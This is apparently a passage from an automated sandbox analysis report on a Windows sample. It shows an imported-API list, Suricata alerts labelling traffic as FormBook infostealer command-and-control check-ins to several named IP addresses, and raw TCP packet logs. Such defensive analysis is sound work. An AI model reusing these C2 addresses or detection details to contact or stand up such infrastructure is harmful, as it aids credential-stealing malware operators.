GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                          USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                          GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                          ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                          OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-11-05T15:42:07.835082+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449730TCP
                                                          2024-11-05T15:42:24.713888+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497363.33.130.19080TCP
                                                          2024-11-05T15:42:40.580377+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497373.33.130.19080TCP
                                                          2024-11-05T15:42:44.059393+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497383.33.130.19080TCP
                                                          2024-11-05T15:42:46.606255+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497393.33.130.19080TCP
                                                          2024-11-05T15:42:47.759944+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449741TCP
                                                          2024-11-05T15:42:48.266162+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497423.33.130.19080TCP
                                                          2024-11-05T15:42:54.246835+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449772213.249.67.1080TCP
                                                          2024-11-05T15:42:57.137402+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449783213.249.67.1080TCP
                                                          2024-11-05T15:42:59.653067+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449798213.249.67.1080TCP
                                                          2024-11-05T15:43:03.246847+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449814213.249.67.1080TCP
                                                          2024-11-05T15:43:09.074514+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498543.33.130.19080TCP
                                                          2024-11-05T15:43:12.512491+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498703.33.130.19080TCP
                                                          2024-11-05T15:43:15.060401+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498843.33.130.19080TCP
                                                          2024-11-05T15:43:31.948296+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4499003.33.130.19080TCP
                                                          2024-11-05T15:43:38.496790+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500163.33.130.19080TCP
                                                          2024-11-05T15:43:40.155976+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500173.33.130.19080TCP
                                                          2024-11-05T15:43:42.721431+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500183.33.130.19080TCP
                                                          2024-11-05T15:43:45.254236+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500193.33.130.19080TCP
                                                          2024-11-05T15:43:51.189788+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450020161.97.142.14480TCP
                                                          2024-11-05T15:43:53.720367+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450021161.97.142.14480TCP
                                                          2024-11-05T15:43:56.255680+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450022161.97.142.14480TCP
                                                          2024-11-05T15:43:58.817264+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450023161.97.142.14480TCP
                                                          2024-11-05T15:44:05.012335+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500248.217.17.19280TCP
                                                          2024-11-05T15:44:07.824897+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500258.217.17.19280TCP
                                                          2024-11-05T15:44:10.344137+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500268.217.17.19280TCP
                                                          2024-11-05T15:44:12.934203+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500278.217.17.19280TCP
                                                          2024-11-05T15:44:19.746712+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002878.141.202.20480TCP
                                                          2024-11-05T15:44:22.327458+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002978.141.202.20480TCP
                                                          2024-11-05T15:44:24.856082+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003078.141.202.20480TCP
                                                          2024-11-05T15:44:27.387334+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003178.141.202.20480TCP
                                                          2024-11-05T15:44:33.583073+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450032184.94.215.2680TCP
                                                          2024-11-05T15:44:36.379438+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450033184.94.215.2680TCP
                                                          2024-11-05T15:44:38.988721+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450034184.94.215.2680TCP
                                                          2024-11-05T15:44:41.510743+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450035184.94.215.2680TCP
                                                          2024-11-05T15:44:48.065467+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500363.33.130.19080TCP
                                                          2024-11-05T15:44:50.599779+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500373.33.130.19080TCP
                                                          2024-11-05T15:44:53.173155+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500383.33.130.19080TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 5, 2024 15:42:21.031043053 CET4973680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:21.036092997 CET80497363.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:21.036236048 CET4973680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:21.044989109 CET4973680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:21.050046921 CET80497363.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:24.712698936 CET80497363.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:24.713821888 CET80497363.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:24.713887930 CET4973680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:24.716700077 CET4973680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:24.721787930 CET80497363.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:39.931983948 CET4973780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:39.937151909 CET80497373.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:39.937433958 CET4973780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:39.994965076 CET4973780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:40.000382900 CET80497373.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:40.580327034 CET80497373.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:40.580377102 CET4973780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:41.512732983 CET4973780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:41.517633915 CET80497373.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:42.531769991 CET4973880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:42.536806107 CET80497383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:42.536919117 CET4973880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:42.547991991 CET4973880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:42.554022074 CET80497383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:44.059392929 CET4973880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:44.065506935 CET80497383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:44.065596104 CET4973880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:45.079598904 CET4973980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:45.084755898 CET80497393.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:45.084872007 CET4973980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:45.096685886 CET4973980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:45.101870060 CET80497393.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:45.101885080 CET80497393.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:45.101893902 CET80497393.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:45.101911068 CET80497393.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:45.101921082 CET80497393.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:45.101929903 CET80497393.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:45.102066994 CET80497393.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:45.102077007 CET80497393.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:45.102507114 CET80497393.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:46.606255054 CET4973980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:46.612303019 CET80497393.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:46.612368107 CET4973980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:47.626199961 CET4974280192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:47.631814003 CET80497423.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:47.637106895 CET4974280192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:47.645574093 CET4974280192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:47.650660992 CET80497423.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:48.264712095 CET80497423.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:48.265263081 CET80497423.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:48.266161919 CET4974280192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:48.269417048 CET4974280192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:42:48.274274111 CET80497423.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:42:53.345469952 CET4977280192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:53.350342035 CET8049772213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:53.350884914 CET4977280192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:53.362118959 CET4977280192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:53.367466927 CET8049772213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:54.203351974 CET8049772213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:54.246834993 CET4977280192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:54.327970982 CET8049772213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:54.328039885 CET4977280192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:54.873006105 CET4977280192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:55.891149044 CET4978380192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:56.208389997 CET8049783213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:56.208638906 CET4978380192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:56.219734907 CET4978380192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:56.224761963 CET8049783213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:57.095061064 CET8049783213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:57.137402058 CET4978380192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:57.219347000 CET8049783213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:57.219439030 CET4978380192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:57.731425047 CET4978380192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:58.751384020 CET4979880192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:58.756493092 CET8049798213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:58.756580114 CET4979880192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:58.768121958 CET4979880192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:58.773255110 CET8049798213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:58.773417950 CET8049798213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:58.773427963 CET8049798213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:58.773436069 CET8049798213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:58.773453951 CET8049798213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:58.773463011 CET8049798213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:58.773554087 CET8049798213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:58.773679018 CET8049798213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:58.773689032 CET8049798213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:59.606549978 CET8049798213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:59.653067112 CET4979880192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:42:59.730310917 CET8049798213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:42:59.730357885 CET4979880192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:43:00.278137922 CET4979880192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:43:01.323821068 CET4981480192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:43:01.328962088 CET8049814213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:43:01.329087973 CET4981480192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:43:01.405841112 CET4981480192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:43:01.411195040 CET8049814213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:43:03.202363968 CET8049814213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:43:03.246846914 CET4981480192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:43:03.326342106 CET8049814213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:43:03.326536894 CET4981480192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:43:03.327614069 CET4981480192.168.2.4213.249.67.10
                                                          Nov 5, 2024 15:43:03.333357096 CET8049814213.249.67.10192.168.2.4
                                                          Nov 5, 2024 15:43:08.443523884 CET4985480192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:08.448506117 CET80498543.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:08.448611975 CET4985480192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:08.459558964 CET4985480192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:08.464603901 CET80498543.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:09.074364901 CET80498543.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:09.074513912 CET4985480192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:09.965641975 CET4985480192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:09.970571995 CET80498543.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:10.985517979 CET4987080192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:10.990350962 CET80498703.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:10.991535902 CET4987080192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:11.007330894 CET4987080192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:11.012382030 CET80498703.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:12.512490988 CET4987080192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:12.518176079 CET80498703.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:12.518277884 CET4987080192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:13.532001972 CET4988480192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:13.536957979 CET80498843.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:13.537065029 CET4988480192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:13.548871040 CET4988480192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:13.554800034 CET80498843.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:13.554812908 CET80498843.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:13.554932117 CET80498843.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:13.554943085 CET80498843.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:13.555181980 CET80498843.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:13.555488110 CET80498843.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:13.555561066 CET80498843.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:13.555723906 CET80498843.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:13.555813074 CET80498843.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:15.060400963 CET4988480192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:15.065692902 CET80498843.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:15.065762997 CET4988480192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:16.079478025 CET4990080192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:16.085163116 CET80499003.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:16.085298061 CET4990080192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:16.095500946 CET4990080192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:16.100457907 CET80499003.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:31.944534063 CET80499003.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:31.948174953 CET80499003.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:31.948296070 CET4990080192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:31.949227095 CET4990080192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:31.954099894 CET80499003.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:36.969542027 CET5001680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:36.975202084 CET80500163.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:36.975276947 CET5001680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:36.988797903 CET5001680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:36.993871927 CET80500163.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:38.496789932 CET5001680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:38.547228098 CET80500163.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:38.549757957 CET80500163.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:38.549804926 CET5001680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:39.516371965 CET5001780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:39.521358967 CET80500173.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:39.525571108 CET5001780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:39.537712097 CET5001780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:39.542751074 CET80500173.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:40.155854940 CET80500173.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:40.155976057 CET5001780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:41.043759108 CET5001780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:41.048968077 CET80500173.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:42.063095093 CET5001880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:42.068886042 CET80500183.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:42.069145918 CET5001880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:42.081111908 CET5001880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:42.086072922 CET80500183.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:42.086102009 CET80500183.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:42.086107969 CET80500183.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:42.086119890 CET80500183.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:42.086148024 CET80500183.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:42.086219072 CET80500183.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:42.086222887 CET80500183.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:42.086236000 CET80500183.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:42.086240053 CET80500183.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:42.721380949 CET80500183.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:42.721431017 CET5001880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:43.590547085 CET5001880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:43.595345974 CET80500183.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:44.610708952 CET5001980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:44.615696907 CET80500193.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:44.615781069 CET5001980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:44.625415087 CET5001980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:44.630378962 CET80500193.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:45.253613949 CET80500193.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:45.254185915 CET80500193.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:45.254235983 CET5001980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:45.257038116 CET5001980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:45.261926889 CET80500193.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:50.320151091 CET5002080192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:50.324979067 CET8050020161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:50.325586081 CET5002080192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:50.337434053 CET5002080192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:50.342205048 CET8050020161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:51.189727068 CET8050020161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:51.189743042 CET8050020161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:51.189788103 CET5002080192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:51.324601889 CET8050020161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:51.324665070 CET5002080192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:51.843545914 CET5002080192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:52.860265970 CET5002180192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:52.865078926 CET8050021161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:52.865207911 CET5002180192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:52.877991915 CET5002180192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:52.883650064 CET8050021161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:53.720088005 CET8050021161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:53.720257998 CET8050021161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:53.720366955 CET5002180192.168.2.4161.97.142.144
